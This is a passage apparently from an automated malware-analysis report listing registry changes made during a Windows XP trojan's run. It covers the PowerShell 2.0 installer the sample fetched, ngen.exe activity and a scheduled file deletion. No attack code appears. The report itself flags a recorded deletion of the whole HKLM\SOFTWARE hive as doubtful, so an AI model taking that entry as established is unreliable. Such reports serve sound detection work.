"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
The process mofcomp.exe:3924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 59 3D 9F 44 CE 09 98 AF 84 12 A4 F4 B3 95 F8"
The process wscript.exe:1992 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 2C 8E 59 12 B1 94 33 4C 1E 13 4E 5A 19 E1 B8"
The Trojan deletes the following registry key(s) (as recorded by the monitor; deleting the HKLM\SOFTWARE hive root outright would render the system unusable, so verify this against the raw trace before treating it as established behaviour):
[HKLM\SOFTWARE]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE]
"(Default)"
The process WindowsXP-KB968930-x86-ENG.exe:2764 makes changes in the system registry. This is the installer of Microsoft update KB968930 (Windows Management Framework Core: Windows PowerShell 2.0, WinRM 2.0 and BITS 4.0), which the sample downloaded into the Internet Explorer cache and launched from the user's Temp folder; the PowerShell assemblies written under %WinDir%\assembly\tmp, the PSCustomSetupUtil.exe, ngen.exe and mscorsvw.exe activity and the NGenService keys that follow are that installer's work, triggered by the sample. The PendingFileRenameOperations entry below has an empty destination, which schedules deletion of the listed file at the next boot.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 3F 27 9D 39 C8 7A 26 22 FE 9E D6 BF F5 8E 97"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\c:\82ea8d5099742dc8f49f42\microsoft.powershell.gpowershell.dll,"
The process ngen.exe:2472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 F8 AF 26 E1 2F DB 27 EA 76 93 81 97 14 C7 B1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
The process ngen.exe:2904 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 87 88 C1 44 ED 53 AA 1C 8C ED C6 04 95 EC 04"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:2456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 8A 95 A8 BA 69 FE 11 37 40 93 E6 EE E2 1E 55"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"
The process ngen.exe:2564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 CB 3B 19 B1 CC 1A C3 29 AF F4 D9 A2 A8 53 68"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:3000 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B 00 9B 0E BD 3B 09 33 6D E8 34 6B 6D AE 2A 21"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:2960 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 CF 1E 12 B5 E7 8E 2B BC B9 F2 E1 E1 13 84 AE"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"
The process ngen.exe:1816 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 2B 36 19 87 6F 64 FD F6 BF DD 02 0A 06 1D A7"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
The process ngen.exe:2520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 B0 B8 7D BA A5 48 DD 39 82 CE D9 06 C1 62 97"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
The process ngen.exe:2484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 9E DD 11 73 22 B4 F8 08 C4 14 9F 1D 3C DC EE"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:2980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 23 80 D7 46 F9 9C D5 F8 A9 2B 36 73 95 B0 31"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
The process ngen.exe:2348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 32 A8 92 F8 86 CF 87 41 81 6A AF A9 E0 35 43"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
The process ngen.exe:3020 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 3B 6D 2B 2F 50 F5 35 0A 49 EC 16 7B 73 37 C9"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:2500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 B8 28 A0 B3 78 C8 38 0D 64 B0 C9 67 64 2B 38"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:2444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 31 71 92 30 02 F7 29 02 C7 C8 CB 3C 0D 5A C9"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:2580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 26 EC A6 C8 55 51 3F B0 38 E9 78 71 75 EC 62"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
The process ngen.exe:224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 86 C3 A9 2B DC C1 9C AF D8 32 06 87 D0 E2 E3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:784 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 E7 58 8D BB BD 9D 56 A4 5E 5A D3 77 FC CD C7"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"
The process ngen.exe:2992 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 76 5C 55 08 39 9A 83 84 CE 77 5F EB 98 AE 5E"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:2492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 58 7C 49 48 55 9F 83 0C 06 86 BA AE 72 60 00"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:2412 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 26 8A A2 0D 13 99 39 09 12 F0 A1 8C 62 5B 58"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
The process ngen.exe:2372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 DE B5 50 4F 2D F3 B6 4A 98 9B 6D 78 C7 98 33"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:2532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 E4 2A B0 97 DA 8A 28 9B 39 ED F3 CB CE FE 84"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
